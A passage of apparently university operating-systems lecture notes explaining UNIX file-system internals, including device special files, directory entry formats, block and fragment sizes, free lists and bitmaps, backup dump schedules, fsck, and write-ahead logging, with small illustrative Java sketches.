you name a device? The answer is that devices appear in the directory tree as special files. An
inode whose type is ``special'' (as opposed to ``directory,'' ``symlink,'' or ``regular'') represents
some sort of I/O device. It is customary to put special files in the directory /dev, but since it is the
inode that is marked ``special,'' they can be anywhere. Instead of containing pointers to disk
blocks, the inode of a special file contains information (in a machine-dependent format) about
the device. The operating system tries to make the device look as much like a file as possible, so
that ordinary programs can open, close, read, or write the device just like a file.
Some devices look more like real files than others. A disk device looks exactly like a file. Reads
return whatever is on the disk and writes can scribble anywhere on the disk. For obvious security
reasons, the permissions for the raw disk devices are highly restrictive. A tape drive looks sort of
like a disk, but a read will return only the next physical block of data on the device, even if more
is requested.
The special file /dev/tty represents the terminal. Writes to /dev/tty display characters on the
screen. Reads from /dev/tty return characters typed on the keyboard. The seek operation on a
device like /dev/tty updates the seek pointer, but the seek pointer has no effect on reads or writes.
Reads of /dev/tty are also different from reads of a file in that they may return fewer bytes than
requested: Normally, a read will return characters only up through the next end-of-line. If the
number of bytes requested is less than the length of the line, the next read will get the remaining
bytes. A read call will block the caller until at least one character can be returned. On machines
with more than one terminal, there are multiple terminal devices with names like /dev/tty0,
/dev/tty1, etc.
Some devices, such as a mouse, are read-only. Write operations on such devices have no effect.
Other devices, such as printers, are write-only. Attempts to read from them give an end-of-file
indication (a return value of zero). There is a special file called /dev/null that does nothing at all:
reads return end-of-file and writes send their data to the garbage bin. (New EPA rules require
that this data be recycled. It is now used to generate federal regulations and other meaningless
documents.) One particularly interesting device is /dev/mem, which is an image of the memory
space of the current process. In a sense, this device is the exact opposite of memory-mapped
files. Instead of making a file look like part of virtual memory, it makes virtual memory look like
a device.
This idea of making all sorts of things look like files can be very powerful. Some versions of
UNIX make network connections look like files. Some versions have a directory with one
special file for each active process. You can read these files to get information about the states of
processes. If you delete one of these files, the corresponding process is killed. Another idea is to
have a directory with one special file for each print job waiting to be printed. Although this idea
was pioneered by UNIX, it is starting to show up more and more in other operating systems.
Long File Names
The UNIX implementation described previously allows arbitrarily long path names for files,
but each component is limited in length. In the original UNIX implementation, each directory
entry is 16 bytes long: two bytes for the inumber and 14 bytes for a path name component.
class Dirent {
    public short inumber;
    public byte name[14];
}
If the name is less than 14 characters long, trailing bytes are filled with nulls (bytes with all bits
set to zero--not to be confused with `0' characters). An inumber of zero is used to mark an entry
as unused (inumbers for files start at 1).
• To look up a name, search the whole directory, starting at the beginning.
• To ``remove'' an entry, set its inumber field to zero.
• To add an entry, search for an entry with a zero inumber field and re-use it. If there aren't any, add an entry to the end (making the file 16 bytes bigger). A sketch of these three operations appears below.
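Here is a minimal sketch of those three operations, treating the directory's contents as a byte array of 16-byte entries. The helper class, the big-endian byte order, and the array-growing strategy are assumptions made for illustration, not the actual UNIX code.

// Sketch of lookup, remove, and add over the original 16-byte directory entries.
class OldDirOps {
    static final int ENTRY = 16;

    static int lookup(byte[] dir, String name) {
        for (int off = 0; off + ENTRY <= dir.length; off += ENTRY) {
            int inumber = ((dir[off] & 0xff) << 8) | (dir[off + 1] & 0xff);
            if (inumber != 0 && name.equals(new String(dir, off + 2, 14).trim()))
                return inumber;
        }
        return 0;                                     // not found
    }

    static void remove(byte[] dir, String name) {
        for (int off = 0; off + ENTRY <= dir.length; off += ENTRY) {
            int inumber = ((dir[off] & 0xff) << 8) | (dir[off + 1] & 0xff);
            if (inumber != 0 && name.equals(new String(dir, off + 2, 14).trim())) {
                dir[off] = dir[off + 1] = 0;          // mark the slot unused
                return;
            }
        }
    }

    // Returns the (possibly reallocated) directory contents.
    static byte[] add(byte[] dir, String name, int inumber) {
        int off;
        for (off = 0; off + ENTRY <= dir.length; off += ENTRY) {
            int existing = ((dir[off] & 0xff) << 8) | (dir[off + 1] & 0xff);
            if (existing == 0)
                break;                                // re-use a free slot
        }
        if (off + ENTRY > dir.length)                 // no free slot: grow by one entry
            dir = java.util.Arrays.copyOf(dir, dir.length + ENTRY);
        dir[off] = (byte) (inumber >> 8);
        dir[off + 1] = (byte) inumber;
        byte[] nameBytes = name.getBytes();
        for (int i = 0; i < 14; i++)                  // null-pad the 14-byte name field
            dir[off + 2 + i] = i < nameBytes.length ? nameBytes[i] : 0;
        return dir;
    }
}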
This representation has one advantage:
• It is very simple. In particular, space allocation is easy because all entries are the same length.
However, it has several disadvantages:
• Since an inumber is only 16 bits, there can be at most 65,535 files on any one disk.
• A file name can be at most 14 characters long.
• Directories grow, but they never shrink.
• Searching a very large directory can be slow.
The people at Berkeley, while they were rewriting the file system code to make it faster, also
changed the format of directories to get rid of the first two problems (they left the remaining
problems unfixed). This new organization has been adopted by many (but not all) versions of
UNIX introduced since then.
The new format of a directory entry looks like this:
class DirentLong {
    int inumber;
    short reclen;
    short namelen;
    byte name[];
}
The inumber field is now a 4-byte (32-bit) integer, so that a disk can have up to 4,294,967,296
files. The reclen field indicates the entire length of the DirentLong entry, including the 8-byte
header. The actual length of the name array is thus reclen - 8 bytes. The namelen field indicates
the length of the name. The remaining space in the name array is unused. This extra padding at
the end of the entry serves three purposes.
• It allows the length of the entry to be padded up to a multiple of 4 bytes so that the integer fields are properly aligned (some computer architectures require integers to be stored at addresses that are multiples of 4).
• The last entry in a disk block can be padded to make it extend to the end of the block. With this trick, UNIX avoids entries that cross block boundaries, simplifying the code.
• It supports a cute trick for coalescing free space. To delete an entry, simply increase the size of the previous entry by the size of the entry being deleted. The deleted entry looks like part of the padding on the end of the previous entry. Since all searches of the directory are done sequentially, starting at the beginning, the deleted entry will effectively ``disappear.'' There's only one problem with this trick: It can't be used to delete the first entry in the directory. Fortunately, the first entry is the `.' entry, which is never deleted.
To create a new entry, search the directory for an entry that has enough padding (according to its reclen and namelen fields) to hold the new entry and split it into two entries by decreasing its reclen field. If no entry with enough padding is found, extend the directory file by one block, make the whole block into one entry, and try again. A sketch of the delete and create operations appears below.
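To make the coalescing trick concrete, here is a minimal sketch of the delete and create operations, assuming the directory's data is available as a byte array of DirentLong records with a 4-byte big-endian inumber followed by 2-byte reclen and namelen fields. The helper names and layout are our own assumptions for illustration, not the actual UNIX code.

// Sketch of deleting and creating DirentLong entries inside a directory's data.
class LongDirOps {
    static int readShort(byte[] b, int off) {
        return ((b[off] & 0xff) << 8) | (b[off + 1] & 0xff);
    }
    static void writeShort(byte[] b, int off, int v) {
        b[off] = (byte) (v >> 8); b[off + 1] = (byte) v;
    }

    // Delete the entry starting at 'off' by folding it into the previous
    // entry's padding (cannot be used for the first entry, which is ".").
    static void delete(byte[] dir, int prevOff, int off) {
        int prevLen = readShort(dir, prevOff + 4);
        int len = readShort(dir, off + 4);
        writeShort(dir, prevOff + 4, prevLen + len);
    }

    // Try to create an entry for 'name' by splitting an entry that has enough
    // padding; returns true on success, false if the caller must grow the file.
    static boolean create(byte[] dir, int dirLen, int inumber, String name) {
        int need = (8 + name.length() + 3) & ~3;        // new entry size, padded to 4 bytes
        for (int off = 0; off < dirLen; ) {
            int reclen = readShort(dir, off + 4);
            int namelen = readShort(dir, off + 6);
            int used = (8 + namelen + 3) & ~3;          // space this entry really needs
            if (reclen - used >= need) {
                writeShort(dir, off + 4, used);         // shrink the old entry
                int newOff = off + used;
                dir[newOff]     = (byte) (inumber >> 24);
                dir[newOff + 1] = (byte) (inumber >> 16);
                dir[newOff + 2] = (byte) (inumber >> 8);
                dir[newOff + 3] = (byte) inumber;
                writeShort(dir, newOff + 4, reclen - used);  // new entry absorbs the leftover padding
                writeShort(dir, newOff + 6, name.length());
                byte[] nb = name.getBytes();
                System.arraycopy(nb, 0, dir, newOff + 8, nb.length);
                return true;
            }
            off += reclen;
        }
        return false;                                   // no room: extend the directory by a block
    }
}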
This approach has two very minor additional benefits over the old scheme. In the old scheme,
every entry is 16 bytes, even if the name is only one byte long. In the new scheme, a name uses
only as much space as it needs (although this doesn't save much, since the minimum size of an
entry in the new scheme is 9 bytes--12 if padding is used to align entries to integer boundaries).
The new approach also allows nulls to appear in file names, but other parts of the system make
that impractical, and besides, who cares?
Block Size and Extents
All of the file organizations we've mentioned store the contents of a file in a set of disk blocks.
How big should a block be? The problem with small blocks is I/O overhead. There is a certain
overhead to read or write a block beyond the time to actually transfer the bytes. If we double the
block size, a typical file will have half as many blocks. Reading or writing the whole file will
transfer the same amount of data, but it will involve half as many disk I/O operations. The
overhead for an I/O operation includes a variable amount of latency (seek time and rotational
delay) that depends on how close the blocks are to each other, as well as a fixed overhead to start
each operation and respond to the interrupt when it completes.
Many years ago, researchers at the University of California at Berkeley studied the original
UNIX file system. They found that when they tried reading or writing a single very large file
sequentially, they were getting only about 2% of the potential speed of the disk. In other words,
it took about 50 times as long to read the whole file as it would if they simply read that many
sequential blocks directly from the raw disk (with no file system software). They tried doubling
the block size (from 512 bytes to 1K) and the performance more than doubled! The reason the
speed more than doubled was that it took less than half as many I/O operations to read the file.
Because the blocks were twice as large, twice as much of the file's data was in blocks pointed to
directly by the inode. Indirect blocks were twice as large as well, so they could hold twice as
many pointers. Thus four times as much data could be accessed through the singly indirect block
without resorting to the doubly indirect block.
If doubling the block size more than doubled performance, why stop there? Why didn't the
Berkeley folks make the blocks even bigger? The problem with big blocks is internal
fragmentation. A file can only grow in increments of whole blocks. If the sizes of files are
random, we would expect on the average that half of the last block of a file is wasted. If most
files are many blocks long, the relative amount of waste is small, but if the block size is large
compared to the size of a typical file, half a block per file is significant. In fact, if files are very
small (compared to the block size), the problem is even worse. If, for example, we choose a
block size of 8k and the average file is only 1K bytes long, we would be wasting about 7/8 of the
disk.
Most files in a typical UNIX system are very small. The Berkeley researchers made a list of the
sizes of all files on a typical disk and did some calculations of how much space would be wasted
by various block sizes. Simply rounding the size of each file up to a multiple of 512 bytes
resulted in wasting 4.2% of the space. Including overhead for inodes and indirect blocks, the
original 512-byte file system had a total space overhead of 6.9%. Changing to 1K blocks raised
the overhead to 11.8%. With 2k blocks, the overhead would be 22.4% and with 4k blocks it
would be 45.6%. Would 4k blocks be worthwhile? The answer depends on economics. In those
days disks were very expensive, and wasting half the disk seemed extreme. These days, disks
are cheap, and for many applications people would be happy to pay twice as much per byte of
disk space to get a disk that was twice as fast.
But there's more to the story. The Berkeley researchers came up with the idea of breaking up the
disk into blocks and fragments. For example, they might use a block size of 2k and a fragment
size of 512 bytes. Each file is stored in some number of whole blocks plus 0 to 3 fragments at the
end. The fragments at the end of one file can share a block with fragments of other files. The
problem is that when we want to append to a file, there may not be any space left in the block
that holds its last fragment. In that case, the Berkeley file system copies the fragments to a new
(empty) block. A file that grows a little at a time may require each of its fragments to be copied
many times. They got around this problem by modifying application programs to buffer their
data internally and add it to a file a whole block's worth at a time. In fact, most programs already
used library routines to buffer their output (to cut down on the number of system calls), so all
they had to do was to modify those library routines to use a larger buffer size. This approach has
been adopted by many modern variants of UNIX. The Solaris system you are using for this
course uses 8k blocks and 1K fragments.
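As a small illustration of how blocks and fragments combine, the following sketch computes how many whole blocks and trailing fragments a file of a given size would occupy under the 8K-block, 1K-fragment layout mentioned above. The class name and the example sizes are arbitrary.

// Illustrative only: blocks and fragments needed for a file of a given size.
class FragmentMath {
    static final int BLOCK = 8 * 1024;
    static final int FRAG  = 1024;

    public static void main(String[] args) {
        long[] sizes = { 500, 3_000, 20_000, 100_000 };   // example file sizes in bytes
        for (long size : sizes) {
            long blocks = size / BLOCK;                   // whole blocks
            long tail = size - blocks * BLOCK;
            long frags = (tail + FRAG - 1) / FRAG;        // fragments for the tail, rounded up
            long allocated = blocks * BLOCK + frags * FRAG;
            System.out.printf("%7d bytes -> %d blocks + %d fragments (%d bytes allocated)%n",
                              size, blocks, frags, allocated);
        }
    }
}

For example, a 20,000-byte file occupies 2 whole blocks plus 4 fragments, for 20,480 bytes allocated, instead of the 24,576 bytes that three whole 8K blocks would take.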
As disks get cheaper and CPU's get faster, wasted space is less of a problem and the speed
mismatch between the CPU and the disk gets worse. Thus the trend is towards larger and larger
disk blocks.
At first glance it would appear that the OS designer has no say in how big a block is. Any
particular disk drive has a sector size, usually 512 bytes, wired in. But it is possible to use larger
``blocks''. For example, if we think it would be a good idea to use 2K blocks, we can group
together each run of four consecutive sectors and call it a block. In fact, it would even be
possible to use variable-sized ``blocks,'' so long as each one is a multiple of the sector size. A
variable-sized ``block'' is called an extent. When extents are used, they are usually used in
addition to multi-sector blocks. For example, a system may use 2k blocks, each consisting of 4
consecutive sectors, and then group them into extents of 1 to 10 blocks. When a file is opened for
writing, it grows by adding an extent at a time. When it is closed, the unused blocks at the end of
the last extent are returned to the system. The problem with extents is that they introduce all the
problems of external fragmentation that we saw in the context of main memory allocation.
Extents are generally only used in systems such as databases, where high-speed access to very
large files is important.
Free Space
We have seen how to keep track of the blocks in each file. How do we keep track of the free
blocks--blocks that are not in any file? There are two basic approaches.
• Use a bit vector. That is simply an array of bits with one bit for each block on the disk. A 1 bit indicates that the corresponding block is allocated (in some file) and a 0 bit says that it is free. To allocate a block, search the bit vector for a zero bit, and set it to one.
• Use a free list. The simplest approach is simply to link together the free blocks by storing the block number of each free block in the previous free block. The problem with this approach is that when a block on the free list is allocated, you have to read it into memory to get the block number of the next block in the list. This problem can be solved by storing the block numbers of additional free blocks in each block on the list. In other words, the free blocks are stored in a sort of lopsided tree on disk. If, for example, 128 block numbers fit in a block, 1/128 of the free blocks would be linked into a list. Each block on the list would contain a pointer to the next block on the list, as well as pointers to 127 additional free blocks. When the first block of the list is allocated to a file, it has to be read into memory to get the block numbers stored in it, but then we can allocate 127 more blocks without reading any of them from disk. Freeing blocks is done by running this algorithm in reverse: Keep a cache of 127 block numbers in memory. When a block is freed, add its block number to this cache. If the cache is full when a block is freed, use the block being freed to hold all the block numbers in the cache and link it to the head of the free list by adding to it the block number of the previous head of the list. A sketch of this scheme appears below.
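Here is the promised sketch of the cached free list, assuming 128 four-byte block numbers fit in a block. The DiskStub stand-in and the in-memory layout (slot 0 holds the link to the next block on the list) are assumptions made so the example is self-contained; they are not the actual UNIX code.

// Stand-in for the disk: maps a block number to the 128 integers stored there.
class DiskStub {
    static java.util.Map<Integer, int[]> blocks = new java.util.HashMap<>();
    static int[] readInts(int blockNumber)             { return blocks.get(blockNumber); }
    static void writeInts(int blockNumber, int[] data) { blocks.put(blockNumber, data.clone()); }
}

class FreeList {
    static final int PER_BLOCK = 128;   // 4-byte block numbers per 512-byte block
    int count;                          // how many numbers are currently cached in memory
    int[] cache = new int[PER_BLOCK];   // cache[0] links to the next block on the list (0 = none)

    // The cache is seeded (say, by mkfs or from the superblock); count must be >= 1.
    FreeList(int[] initial, int initialCount) {
        System.arraycopy(initial, 0, cache, 0, initialCount);
        count = initialCount;
    }

    // Allocate a free block, refilling the cache from disk when it runs out.
    int allocate() {
        if (count == 1) {                        // only the link to the next list block remains
            int next = cache[0];
            if (next == 0)
                throw new RuntimeException("disk full");
            cache = DiskStub.readInts(next);     // pull in up to 128 more block numbers
            count = PER_BLOCK;
            return next;                         // the list block itself is now allocated
        }
        return cache[--count];
    }

    // Free a block, spilling the cache to the freed block when the cache is full.
    void free(int blockNumber) {
        if (count == PER_BLOCK) {
            DiskStub.writeInts(blockNumber, cache);  // the freed block now holds the cached numbers
            cache = new int[PER_BLOCK];
            cache[0] = blockNumber;                  // and becomes the new head of the list
            count = 1;
        } else {
            cache[count++] = blockNumber;
        }
    }
}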
How do these methods compare? Neither requires significant space overhead on disk. The
bitmap approach needs one bit for each block. Even for a tiny block size of 512 bytes, each bit of
the bitmap describes 512*8 = 4096 bits of disk space, so the overhead is less than 1/40 of 1%.
The free list is even better. All the pointers are stored in blocks that are free anyhow, so there is
no space overhead (except for one pointer to the head of the list). Another way of looking at this
is that when the disk is full (which is the only time we should be worried about space overhead!)
the free list is empty, so it takes up no space. The real advantage of bitmaps over free lists is that
they give the space allocator more control over which block is allocated to which file. Since the
blocks of a file are generally accessed together, we would like them to be near each other on
disk. To ensure this clustering, when we add a block to a file we would like to choose a free
block that is near the other blocks of a file. With a bitmap, we can search the bitmap for an
appropriate block. With a free list, we would have to search the free list on disk, which is clearly
impractical. Of course, to search the bitmap, we have to have it all in memory, but since the
bitmap is so tiny relative to the size of the disk, it is not unreasonable to keep the entire bitmap in
memory all the time. To do the comparable operation with a free list, we would need to keep the
block numbers of all free blocks in memory. If a block number is four bytes (32 bits), that means
that 32 times as much memory would be needed for the free list as for a bitmap. For a concrete
example, consider a 2 gigabyte disk with 8K blocks and 4-byte block numbers. The disk contains
2^31/2^13 = 2^18 = 262,144 blocks. If they are all free, the free list has 262,144 entries, so it would
take one megabyte of memory to keep them all in memory at once. By contrast, a bitmap
requires 2^18 bits, or 2^15 = 32K bytes (just four blocks). (On the other hand, the bit map takes the
same amount of memory regardless of the number of blocks that are free).
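Because the bitmap is small enough to keep in memory, a bitmap allocator can also search near a desired block to get clustering. Here is a minimal in-memory sketch; the class name and the near parameter are illustrative choices, not a particular file system's interface.

import java.util.BitSet;

// Sketch of a bitmap free-space allocator. A set bit means the block is
// allocated. allocate(near) prefers a free block close to 'near', which is
// how a bitmap supports the clustering described above.
class BlockBitmap {
    private final BitSet bits;
    private final int nblocks;

    BlockBitmap(int nblocks) {
        this.nblocks = nblocks;
        this.bits = new BitSet(nblocks);
    }

    // Allocate a free block as close as possible to 'near'; returns -1 if the disk is full.
    int allocate(int near) {
        for (int d = 0; d < nblocks; d++) {
            int lo = near - d, hi = near + d;
            if (lo >= 0 && !bits.get(lo)) { bits.set(lo); return lo; }
            if (hi < nblocks && !bits.get(hi)) { bits.set(hi); return hi; }
        }
        return -1;
    }

    void free(int blockNumber) {
        bits.clear(blockNumber);
    }
}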
Reliability
Disks fail, disks sectors get corrupted, and systems crash, losing the contents of volatile memory.
There are several techniques that can be used to mitigate the effects of these failures. We only
have room for a brief survey.
Bad-block Forwarding
When the disk drive writes a block of data, it also writes a checksum, a small number of
additional bits whose value is some function of the ``user data'' in the block. When the block is
read back in, the checksum is also read and compared with the data. If either the data or
checksum were corrupted, it is extremely unlikely that the checksum comparison will succeed.
Thus the disk drive itself has a way of discovering bad blocks with extremely high probability.
The hardware is also responsible for recovering from bad blocks. Modern disk drives do
automatic bad-block forwarding. The disk drive or controller is responsible for mapping block
numbers to absolute locations on the disk (cylinder, track, and sector). It holds a little bit of space
in reserve, not mapping any block numbers to this space. When a bad block is discovered, the
disk allocates one of these reserved blocks and maps the block number of the bad block to the
replacement block. All references to this block number access the replacement block instead of
the bad block. There are two problems with this scheme. First, when a block goes bad, the data in
it is lost. In practice, blocks tend to be bad from the beginning, because of small defects in the
surface coating of the disk platters. There is usually a stand-alone formatting program that tests
all the blocks on the disk and sets up forwarding entries for those that fail. Thus the bad blocks
never get used in the first place. The main reason for the forwarding is that it is just too hard
(expensive) to create a disk with no defects. It is much more economical to manufacture a
``pretty good'' disk and then use bad-block forwarding to work around the few bad blocks. The
other problem is that forwarding interferes with the OS's attempts to lay out files optimally. The
OS may think it is doing a good job by assigning consecutive blocks of a file to consecutive
block numbers, but if one of those blocks is forwarded, it may be very far away from the others. In
practice, this is not much of a problem since a disk typically has only a handful of forwarded
sectors out of millions.
The software can also help avoid bad blocks by simply leaving them out of the free list (or
marking them as allocated in the allocation bitmap).
Back-up Dumps
There are a variety of storage media that are much cheaper than (hard) disks but are also much
slower. An example is 8 millimeter video tape. A ``two-hour'' tape costs just a few dollars and
can hold two gigabytes of data. By contrast, a 2GB hard drive currently costs several hundred
dollars. On the other hand, while worst-case access time to a hard drive is a few tens of
milliseconds, rewinding or fast-forwarding a tape to the desired location can take several minutes.
One way to use tapes is to make periodic back up dumps. Dumps are really used for two
different purposes:
• To recover lost files. Files can be lost or damaged by hardware failures, but far more often they are lost through software bugs or human error (accidentally deleting the wrong file). If the file is saved on tape, it can be restored.
• To recover from catastrophic failures. An entire disk drive can fail, or the whole computer can be stolen, or the building can burn down. If the contents of the disk have been saved to tape, the data can be restored (to a repaired or replacement disk). All that is lost is the work that was done since the information was dumped.
Corresponding to these two ways of using dumps, there are two ways of doing dumps. A
physical dump simply copies all of the blocks of the disk, in order, to tape. It's very fast, both for
doing the dump and for recovering a whole disk, but it makes it extremely slow to recover any
one file. The blocks of the file are likely to be scattered all over the tape, and while seeks on disk
can take tens of milliseconds, seeks on tape can take tens or hundreds of seconds. The other
approach is a logical dump, which copies each file sequentially. A logical dump makes it easy to
restore individual files. It is even easier to restore files if the directories are dumped separately at
the beginning of the tape, or if the name(s) of each file are written to the tape along with the file.
The problem with logical dumping is that it is very slow. Dumps are usually done much more
frequently than restores. For example, you might dump your disk every night for three years
before something goes wrong and you need to do a restore. An important trick that can be used
with logical dumps is to only dump files that have changed recently. An incremental dump saves
only those files that have been modified since a particular date and time. Fortunately, most file
systems record the time each file was last modified. If you do a backup each night, you can save
only those files that have changed since the last backup. Every once in a while (say once a
month), you can do a full backup of all files. In UNIX jargon, a full backup is called an epoch
(pronounced ``eepock'') dump, because it dumps everything that has changed since ``the epoch''--January 1, 1970, which is the earliest possible date in UNIX.
The Computer Sciences department currently does backup dumps on about 260 GB of disk
space. Epoch dumps are done once every 14 days, with the timing on different file systems
staggered so that about 1/14 of the data is dumped each night. Daily incremental dumps save
about 6-10% of the data on each file system.
Incremental dumps go fast because they dump only a small fraction of the files, and they don't
take up a lot of tape. However, they introduce new problems:
• If you want to restore a particular file, you need to know when it was last modified so that you know which dump tape to look at.
• If you want to restore the whole disk (to recover from a catastrophic failure), you have to restore from the last epoch dump, and then from every incremental dump since then, in order. A file that is modified every day will appear on every tape. Each restore will overwrite the file with a newer version. When you're done, everything will be up-to-date as of the last dump, but the whole process can be extremely slow (and labor-intensive).
• You have to keep around all the incremental tapes since the last epoch. Tapes are cheap, but they're not free, and storing them can be a hassle.
The first problem can be solved by keeping a directory of what was dumped when. A bunch of
UW alumni (the same guys that invented NFS) have made themselves millionaires by marketing
software to do this. The other problems can be solved by a clever trick. Each dump is assigned a
positive integer level. A level n dump is an incremental dump that dumps all files that have
changed since the most recent previous dump with a level greater than or equal to n. An epoch
dump is considered to have infinitely high level. Levels are assigned to dumps as follows: dump
number n gets level k+1, where 2^k is the largest power of two that divides n, giving the
sequence 1, 2, 1, 3, 1, 2, 1, 4, 1, 2, 1, 3, 1, 2, 1, 5, and so on.
This scheme is sometimes called a ruler schedule for obvious reasons. Level-1 dumps only save
files that have changed in the previous day. Level-2 dumps save files that have changed in the
last two days, level-3 dumps cover four days, level-4 dumps cover 8 days, etc. Higher-level
dumps will thus include more files (so they will take longer to do), but they are done
infrequently. The nice thing about this scheme is that you only need to save one tape from each
level, and the number of levels is the logarithm of the interval between epoch dumps. Thus, even
if you did a dump each night and did an epoch dump only once a year, you would need only
nine levels (hence nine tapes). That also means that a full restore needs at worst one restore from
each of nine tapes (rather than 365 tapes!). To figure out what tapes you need to restore from if
your disk is destroyed after dump number n, express n in binary, and number the bits from right
to left, starting with 1. The 1 bits tell you which dump tapes to use. Restore them in order of
decreasing level. For example, 20 in binary is 10100, so if the disk is destroyed after the 20th
dump, you only need to restore from the epoch dump and from the most recent dumps at levels 5
and 3.
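The binary trick in the last paragraph is easy to mechanize. The following sketch (the class and method names are ours, not part of any real dump utility) lists, in decreasing order of level, which dump levels to restore from after the epoch dump.

// Given the number of the last dump before the failure, list the dump levels
// to restore from (after the epoch dump), by reading off the 1 bits of n.
class RulerRestore {
    static java.util.List<Integer> levelsToRestore(int n) {
        java.util.List<Integer> levels = new java.util.ArrayList<>();
        for (int bit = 31; bit >= 0; bit--)          // bit i (counting from 0) corresponds to level i+1
            if ((n & (1 << bit)) != 0)
                levels.add(bit + 1);
        return levels;
    }

    public static void main(String[] args) {
        // 20 is 10100 in binary, so restore from the epoch dump, then the most
        // recent level-5 dump, then the most recent level-3 dump.
        System.out.println(levelsToRestore(20));     // prints [5, 3]
    }
}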
Consistency Checking
Some of the information in a file system is redundant. For example, the free list could be
reconstructed by checking which blocks are not in any file. Redundancy arises because the same
information is represented in different forms to make different operations faster. If you want to
know which blocks are in a given file, look at the inode. If you want to know which blocks
are not in any inode, use the free list. Unfortunately, various hardware and software errors can
cause the data to become inconsistent. File systems often include a utility that checks for
consistency and optionally attempts to repair inconsistencies. These programs are particularly
handy for cleaning up the disks after a crash.
UNIX has a utility called fsck (``file system check''). It has two principal tasks. First, it checks that blocks are
properly allocated. Each inode is supposed to be the root of a tree of blocks, the free list is
supposed to be a tree of blocks, and each block is supposed to appear in exactly one of these
trees. Fsck runs through all the inodes, checking each allocated inode for reasonable values,
and walking through the tree of blocks rooted at the inode. It maintains a bit vector to record
which blocks have been encountered. If a block is encountered that has already been seen, there is
a problem: Either it occurred twice in the same file (in which case it isn't a tree), or it occurred in
two different files. A reasonable recovery would be to allocate a new block, copy the contents of
the problem block into it, and substitute the copy for the problem block in one of the two places
where it occurs. It would also be a good idea to log an error message so that a human being can
check up later to see what's wrong. After all the files are scanned, any block that hasn't been
found should be on the free list. It would be possible to scan the free list in a similar manner, but
it's probably easier just to rebuild the free list from the set of blocks that were not found in any
file. If a bitmap instead of a free list is used, this step is even easier: Simply overwrite the file
system's bitmap with the bitmap constructed during the scan.
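Here is a minimal sketch of that block-allocation pass, assuming an in-memory array of inodes, each of which can list its blocks. The Inode class and blockList method are stand-ins for walking the real tree of direct and indirect blocks; duplicates are only reported here, not repaired.

import java.util.*;

// Sketch of the block-allocation pass of a consistency checker.
class BlockCheck {
    static BitSet scan(Inode[] inodes, int nblocks) {
        BitSet seen = new BitSet(nblocks);
        for (Inode ino : inodes) {
            if (ino == null || !ino.allocated)
                continue;
            for (int b : ino.blockList()) {
                if (seen.get(b))
                    System.err.println("block " + b + " appears more than once");
                seen.set(b);
            }
        }
        return seen;   // blocks NOT set here should be on the free list (or free in the bitmap)
    }
}

class Inode {
    boolean allocated;
    List<Integer> blocks = new ArrayList<>();
    List<Integer> blockList() { return blocks; }   // a real version would also walk indirect blocks
}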
The other main consistency requirement concerns the directory structure. The set of directories is
supposed to be a tree, and each inode is supposed to have a link count that indicates how many
times it appears in directories. The tree structure could be checked by a recursive walk through
the directories, but it is more efficient to combine this check with the walk through the inodes
that checks for disk blocks, but recording, for each directory inode encountered, the inumber of
its parent. The set of directories is a tree if and only if and only if every directory other than the
root has a unique parent. This pass can also rebuild the link count for each inode by maintaining
in memory an array with one slot for each inumber. Each time the inumber is found in a
directory, increment the corresponding element of the array. The resulting counts should match
the link counts in the inodes. If not, correct the counts in the inodes.
This illustrates a very important principle that pops up throughout operating system
implementation (indeed, throughout any large software system): the doctrine of hints and
absolutes. Whenever the same fact is recorded in two different ways, one of them should be
considered the absolute truth, and the other should be considered a hint. Hints are handy because
they allow some operations to be done much more quickly than they could if only the absolute
information was available. But if the hint and the absolute do not agree, the hint can be rebuilt
from the absolutes. In a well-engineered system, there should be some way to verify a hint
whenever it is used. UNIX is a bit lax about this. The link count is a hint (the absolute
information is a count of the number of times the inumber appears in directories), but UNIX
treats it like an absolute during normal operation. As a result, a small error can snowball into
completely trashing the file system.
For another example of hints, each allocated block could have a header containing the inumber
of the file containing it and its offset in the file. There are systems that do this (UNIX isn't one of
them). The tree of blocks rooted at an inode then becomes a hint, providing an efficient way of
finding a block, but when the block is found, its header could be checked. Any inconsistency
would then be caught immediately, and the inode structures could be rebuilt from the
information in the block headers.
By the way, if the link count calculated by the scan is zero (i.e., the inode, although marked as
allocated, does not appear in any directory), it would not be prudent to delete the file. A better
recovery is to add an entry to a special lost+found directory pointing to the orphan inode, in case
it contains something really valuable.
Transactions
The previous section talks about how to recover from situations that ``can't happen.'' How do
these problems arise in the first place? Wouldn't it be better to prevent these problems rather than
recover from them after the fact? Many of these problems arise, particularly after a crash,
because some operation was ``half-completed.'' For example, suppose the system was in the
middle of executing an unlink system call when the lights went out. An unlink operation involves
several distinct steps:
• remove an entry from a directory,
• decrement a link count, and if the count goes to zero,
• move all the blocks of the file to the free list, and
• free the inode.
If the crash occurs between the first and second steps, the link count will be wrong. If it occurs
during the third step, a block may be linked both into the file and the free list, or neither,
depending on the details of how the code is written. And so on...
To deal with this kind of problem in a general way, transactions were invented. Transactions
were first developed in the context of database management systems, and are used heavily there,
so there is a tradition of thinking of them as ``database stuff'' and teaching about them only in
database courses and textbooks. But they really are an operating system concept. Here's a two-bit introduction.
We have already seen a mechanism for making complex operations appear atomic. It is called a
critical section. Critical sections have a property that is sometimes called synchronization
atomicity. It is also called serializability because if two processes try to execute their critical
sections at about the same time, the net effect will be as if they occurred in some serial order. If
systems can crash (and they can!), synchronization atomicity isn't enough. We need another
property, called failure atomicity, which means an ``all or nothing'' property: Either all of the
modifications of nonvolatile storage complete or none of them do.
There are basically two ways to implement failure atomicity. They both depend on the fact that
writing a single block to disk is an atomic operation. The first approach is called logging. An
append-only file called a log is maintained on disk. Each time a transaction does something to
file-system data, it creates a log record describing the operation and appends it to the log. The
log record contains enough information to undo the operation. For example, if the operation
made a change to a disk block, the log record might contain the block number, the length and
offset of the modified part of the block, and the original content of that region. The
transaction also writes a begin record when it starts, and a commit record when it is done. After a
crash, a recovery process scans the log looking for transactions that started (wrote a begin
record) but never finished (wrote a commit record). If such a transaction is found, its partially
completed operations are undone (in reverse order) using the undo information in the log
records.
Sometimes, for efficiency, disk data is cached in memory. Modifications are made to the cached
copy and only written back out to disk from time to time. If the system crashes before the
changes are written to disk, the data structures on disk may be inconsistent. Logging can also be
used to avoid this problem by putting into each log record redo information as well as undo
information. For example, the log record for a modification of a disk block should contain both
the old and new value. After a crash, if the recovery process discovers a transaction that has
completed, it uses the redo information to make sure the effects of all of its operations are
reflected on disk. Full recovery is always possible provided that:
• The log records are written to disk in order,
• The commit record is written to disk when the transaction completes, and
• The log record describing a modification is written to disk before any of the changes made by that operation are written to disk.
This algorithm is called write-ahead logging.
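Here is a toy sketch of write-ahead logging for block updates, with the log and the disk simulated in memory so the example is self-contained. The record format and method names are illustrative assumptions, not a real file system's log format.

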